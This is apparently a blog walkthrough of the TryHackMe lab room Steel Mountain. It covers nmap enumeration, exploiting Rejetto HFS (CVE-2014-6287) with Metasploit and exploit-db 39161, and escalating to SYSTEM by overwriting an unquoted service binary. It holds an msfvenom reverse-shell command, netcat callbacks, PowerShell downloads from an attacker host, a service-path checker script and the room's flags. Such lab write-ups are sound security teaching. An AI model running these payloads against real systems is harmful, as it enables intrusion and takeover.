TryHackMe: Steel Mountain — Walkthrough

December 19, 2024
Posted in CTF, TryHackMe
by Jasper

Welcome! It is time to look at the final CTF-like room on the Complete Beginner path of THM. This room is called Steel Mountain and I am excited to look at it, since it is a Windows machine and Windows has not been covered as much so far. I am making these walkthroughs to keep myself motivated to learn cyber security and to make sure I retain the knowledge gained from THM's rooms.
Join me in learning cyber security. I will try to explain concepts as I go, to differentiate myself from other walkthroughs.

Steel Mountain

Steel Mountain CTF

Room URL: https://tryhackme.com/room/steelmountain


Task 1 (Introduction)

In this Steel Mountain room you will enumerate a Windows machine, gain initial access with Metasploit, use Powershell to further enumerate the machine and escalate your privileges to Administrator.

If you don’t have the right security tools and environment, deploy your own Kali Linux machine and control it in your browser, with our Kali Room.

Please note that this machine does not respond to ping (ICMP) and may take a few minutes to boot up.

Questions

Deploy the machine. Who is the employee of the month?

As always, start with some nmap port scanning. I use the following command for this:

nmap -sV -sC -oN nmap.out -p- <target ip>

This runs version detection (-sV), the default NSE scripts (-sC), scans all 65535 TCP ports (-p-) and writes normal-format output to a file called nmap.out. Because the room warns that the machine does not answer ICMP, add -Pn if nmap reports the host as down; that skips host discovery and scans the ports anyway. We get the following results:

Nmap results showing open ports and services

And more:

Host script results

There is a bunch of interesting stuff here. We have a website on port 80, RPC, SMB on ports 139 and 445, WinRM on 5985 and 47001 (nmap labels these HTTP because WinRM speaks HTTP), and another web server on 8080. Finally, port 3389 is RDP, which nmap reports as an SSL/TLS-wrapped service because the RDP session is encrypted.

Let’s have a look at the website first! Visit the ip address on port 80.

Home page showing employee of the month

Hmm, there is the employee of the month, but what is his name?

Let’s have a look at the source code:

Home page source code

The image is called BillHarper.png so I am going to guess that’s his name! 😉

Answer: Bill Harper


Task 2 (Initial Access)

Now you have deployed the machine, let's get an initial shell!

Questions

Scan the machine with nmap. What is the other port running a web server on?

Well, we already port scanned in the previous section, so we can start answering these questions 🙂

From our nmap scan we can see that there is also an HTTP FileServer (version 2.3) running on port 8080:

HTTP FileServer running on port 8080

Answer: 8080

Take a look at the other web server. What file server is running?

On the above screenshot we can find the following:

Server information

HttpFileServer is not the answer though. Let’s click on that link:

Rejetto web page

The developer is called Rejetto, and after some trial and error I figured out the answer.

Answer: Rejetto HTTP File Server.

What is the CVE number to exploit this file server?

We know the name of the file server and that it is running version 2.3. We can therefore use the searchsploit command (or search exploit-db's website). I entered the following command:

searchsploit http file server -w

This gave me the following results. The -w flag prints exploit-db URLs instead of local file paths.

Searching for HTTP File Server exploits

If you look carefully you can see that there are at least two exploits for version 2.3.x. Let's open the Remote Command Execution (1) entry on exploit-db.

That page lists the CVE number, which is the answer. CVE-2014-6287 is a bug in how HFS parses the search parameter: the findMacroMarker routine stops scanning at a %00 (null) byte, so a request like /?search=%00{.exec|...} hands the rest of the parameter to HFS's macro engine, which can run arbitrary commands.

Answer: 2014-6287

Use Metasploit to get an initial shell. What is the user flag?

Start Metasploit by running msfconsole.

The great thing about Metasploit is that we can search by CVE number. Let's do this by running:

search 2014-6287
Searching for the Metasploit exploit module

Follow this with use 0, which selects the first search result, the exploit/windows/http/rejetto_hfs_exec module.

To see the different options we need to adjust we can run show options.

Showing module options

Most options already have sensible defaults, so the only ones we have to set are RHOSTS (the target IP address) and RPORT (8080 here, because the module defaults to port 80). You can set them with set RHOSTS <ip> and set RPORT 8080. If you attack from your own VPN-connected machine instead of the AttackBox, also set LHOST to your tun0 address, otherwise the reverse connection never reaches you.

Now all we need to do is enter run or exploit.

We got access to a meterpreter shell:

Gaining a meterpreter shell

Now we need to find the user flag.

We can use the following command to search for all txt files:

search -f *.txt

This gives us the following result:

Searching for text files

Now all we need to do is read the file.

Reading the flag

Remember to use forward slashes in the path; meterpreter treats backslashes as escape characters.

Answer: b04763b6fcf51fcd7c13abc7db4fd365


Task 3 (Privilege Escalation)

Now that you have an initial shell on this Windows machine as Bill (enter getuid in the meterpreter shell to see this), we can further enumerate the machine and escalate our privileges to Administrator/SYSTEM (the Windows equivalent of root)!

Questions

To enumerate this machine, we will use a PowerShell script called PowerUp (part of the PowerSploit project), whose purpose is to evaluate a Windows machine and flag misconfigurations: "PowerUp aims to be a clearinghouse of common Windows privilege escalation vectors that rely on misconfigurations." You can download the script here.

Use meterpreter's upload command to copy the script to the target. To execute it from meterpreter, load the PowerShell extension with load powershell, then open an interactive PowerShell session with powershell_shell:

Uploading the PowerUp Powershell script

After doing this, dot-source the script so its functions are loaded into the current session:

. .\PowerUp.ps1

Followed by:

Invoke-AllChecks

This gives a long list with abnormalities:

Listing abnormalities found by PowerUp

Answer: No answer needed

Take close attention to the CanRestart option that is set to true. What is the name of the service which shows up as an unquoted service path vulnerability?

The name is found at the top.

Answer: AdvancedSystemCareService9

PowerUp reports two things about this service. Its binary path, C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe, contains spaces but is not quoted, and CanRestart is True, meaning our current user is allowed to stop and start the service. On top of that, the directory holding ASCService.exe is writable by us. That last point is what we actually abuse: rather than planting a file at one of the locations an unquoted path makes Windows try first (C:\Program.exe and so on), we overwrite the service binary itself with our own executable and restart the service, which then runs our program with the service's privileges.

Use msfvenom to generate a reverse shell as a Windows executable.

msfvenom -p windows/shell_reverse_tcp LHOST=<attacker ip> LPORT=4443 -e x86/shikata_ga_nai -f exe-service -o ASCService.exe

This writes a reverse shell to ASCService.exe. The -f exe-service format matters: the service control manager expects the started binary to register itself as a service, and a plain -f exe payload gets killed after roughly 30 seconds when it fails to do so, taking our shell with it. exe-service wraps the payload in a proper service stub.

We can now leave the PowerShell session (type exit) and use the same meterpreter upload command as before:

Uploading the ASCService reverse shell

Now we need to replace the legitimate binary. Drop into a regular cmd shell from meterpreter by entering: shell.

Before copying, stop the service:

sc stop AdvancedSystemCareService9
Stopping the AdvancedSystemCareService9 service

Then copy our file over the original. The destination path contains spaces, so it must be quoted, and the command should be run from the directory you uploaded ASCService.exe into (copy the original aside first if you want to restore it later):

copy ASCService.exe "C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe"
Copying the ASCService shell to overwrite the original file

Now we need to start a listener!

nc -lvnp 4443

Then start the service again. The service control manager launches our binary under the service's account, and the listener catches the shell.

sc start AdvancedSystemCareService9
Starting the AdvancedSystemCareService9 service

And we have system access!

Gaining system access

Answer: No answer needed

What is the root flag?

You can find the root flag on the Administrator's Desktop:

Reading the root flag

Answer: 9af5f314f57607c00fd09803a587db80


Task 4 (Access and Escalation Without Metasploit)

Now it is time to use the following exploit without the use of Metasploit: https://www.exploit-db.com/exploits/39161

Questions

To begin we shall be using the same CVE. However, this time let’s use this exploit. *Note that you will need to have a web server and a netcat listener active at the same time in order for this to work!*

To begin, you will need a netcat static binary on your web server. If you do not have one, you can download it from GitHub!

You will need to run the exploit twice. The first time will pull our netcat binary to the system and the second will execute our payload to gain a callback!

Let’s go over the process:

  1. Download the exploit
    Copy the raw text from:
    https://www.exploit-db.com/raw/39161
    and save it into a new file. I called it exploit.py.
  2. Edit the ip in the script
    Set the ip_addr variable to your attacker machine's VPN (tun0) address. You can leave local_port at its default if you want.
  3. Edit the port number in the script for the file server
    The script's download stage fetches nc.exe from http://<ip_addr>/nc.exe, i.e. port 80 by default. That port is often already in use on THM AttackBoxes, so we cannot use it for the web server we start in step 5. Appending ":8000" to the ip_addr variable makes the download come from port 8000 instead. See image below step 8.
  4. Download a netcat static binary
    Download the netcat binary here:
    https://github.com/andrew-d/static-binaries/blob/master/binaries/windows/x86/ncat.exe
    It needs to be renamed to nc.exe, because that is the file name the exploit script requests.
  5. Serve the binary by running a Python webserver
    In the directory that holds nc.exe, start a simple Python web server: python3 -m http.server 8000
  6. Start a listener
    Start a simple netcat listener with nc -lvnp 443 (this must match local_port in the script).
  7. Run the exploit with the correct arguments
    Run: python2 exploit.py 10.10.13.114 8080
    The script is written for Python 2 (it imports urllib2); it will not run under python3 without porting.
  8. Run the exploit once more
    The first run drops the downloader on the target and pulls nc.exe over from our web server; the second run's final stage then launches nc.exe and we get the callback.
Editing the exploit script to add ":8000" port

If you have done everything right you have 3 terminal tabs open. One running the exploit, one running the python http server, and one running the netcat listener.

Answer: No answer needed

We received a reverse shell!

Congratulations, we are now on the system. Next we pull winPEAS over using powershell -c.

Download a winPEAS binary (https://github.com/carlospolop/PEASS-ng/releases/tag/20220717) and host it with the Python web server once more. On the target, change directory to Bill's desktop (see below) and run the following from the shell (wget is PowerShell's built-in alias for Invoke-WebRequest, so nothing extra is needed on the target):

powershell -c wget "http://<attacker ip>:8000/winPEAS.exe" -outfile "winPEAS.exe"
Downloading the winPEAS executable to the target machine

Once we run winPEAS (simply type winPEAS.exe in the shell), it points us to unquoted service paths and names the affected service, which is also currently running.

winPEAS finding the same vulnerability as we saw earlier

We see the same vulnerability as we did when we used Metasploit!

What powershell -c command could we run to manually find out the service name? *Format is “powershell -c “command here”*

Answer: powershell -c Get-Service
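Get-Service only lists service names and states; the path itself comes from Win32_Service's PathName property (for example via Get-CimInstance or wmic service get Name,PathName). Given such a list, the check PowerUp and winPEAS perform, and the reason the unquoted AdvancedSystemCareService9 path from Task 3 is dangerous, can be reproduced offline. The block below is an added example of mine, not PowerUp, winPEAS or the page's code: it takes constructed service records (only AdvancedSystemCareService9's path is from the walkthrough, the other two are made up for contrast), flags unquoted paths containing spaces, lists the files Windows would try in order, and optionally checks which of them the current user can write. Whether you may restart the service (PowerUp's CanRestart) is a separate check, for example with sc sdshow <service>.

```python
r"""Unquoted service path check, the way PowerUp and winPEAS reason about it.

Added example; not PowerUp, winPEAS or the page's code. SAMPLE_SERVICES is
constructed in the shape of `wmic service get Name,PathName` output; only
AdvancedSystemCareService9's path comes from the walkthrough.
"""
import ntpath
import os
import re

SAMPLE_SERVICES = [
    # constructed sample records: (service name, PathName as the SCM stores it)
    ("AdvancedSystemCareService9",
     r"C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe"),
    ("QuotedVendorSvc", r'"C:\Program Files\Vendor\Some Tool\tool.exe" -service'),
    ("NoSpacesSvc", r"C:\Windows\System32\svchost.exe -k netsvcs"),
]

_FIRST_EXE = re.compile(r"^(.*?\.exe)", re.IGNORECASE)


def image_path(pathname: str) -> str:
    """Extract the executable from a PathName.

    Quoted paths are unambiguous. For unquoted ones we cut after the first
    '.exe' (a simplification: service arguments rarely contain '.exe').
    """
    p = pathname.strip()
    if p.startswith('"'):
        return p[1:].split('"', 1)[0]
    m = _FIRST_EXE.match(p)
    return m.group(1) if m else p


def hijack_candidates(image: str) -> list:
    r"""Files CreateProcess tries, in order, for an unquoted image path.

    Windows cuts the string at each space and appends .exe, so for
    c:\program files\sub dir\program name it tries c:\program.exe,
    c:\program files\sub.exe, c:\program files\sub dir\program.exe and
    finally the full name. Whoever can create an earlier file wins.
    """
    cands = [image[:i] + ".exe" for i, ch in enumerate(image) if ch == " "]
    cands.append(image if image.lower().endswith(".exe") else image + ".exe")
    return cands


def default_can_write(path: str) -> bool:
    """Best-effort writability check when run on the target itself.

    Caveat: os.access on Windows only honours the read-only attribute, not
    the ACL. Confirm with icacls or Get-Acl before relying on the answer.
    """
    target = path if os.path.exists(path) else ntpath.dirname(path)
    return os.path.exists(target) and os.access(target, os.W_OK)


def analyze(services, can_write=default_can_write) -> list:
    """Report each unquoted, space-containing service path with its hijack points.

    The walkthrough abuses the last candidate (the real binary sits in a
    directory we can write to); the earlier candidates are the classic
    unquoted-path hijack and only matter if their directory is writable.
    """
    findings = []
    for name, pathname in services:
        if pathname.strip().startswith('"'):
            continue  # quoted: the SCM uses exactly that path
        image = image_path(pathname)
        if " " not in image:
            continue  # no space, no ambiguity
        cands = hijack_candidates(image)
        findings.append({
            "name": name,
            "image": image,
            "candidates": cands,
            "writable": [c for c in cands if can_write(c)],
        })
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_SERVICES):
        print(f'{f["name"]}: {f["image"]}')
        for c in f["candidates"]:
            flag = "  <- writable" if c in f["writable"] else ""
            print(f"    tries {c}{flag}")
```

Run on a Linux attack box it only lists the candidates (none of the paths exist there); run on the Windows target with the default can_write it also marks the ones you could overwrite, subject to the ACL caveat in the code.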

Now let’s escalate to Administrator with our new found knowledge. Generate your payload using msfvenom and pull it to the system using powershell.

I am leaving this to you, as the process is very similar to what we did with Metasploit!

Answer: No answer needed

Wow, we are done with Steel Mountain!

Task 3 and task 4 were quite tricky in my opinion, but I have tried to explain the concepts as well as I could. I got a lot more knowledge and I hope you can say the same. Anyway, I’m out! Please send a few claps if you don’t mind 🙂

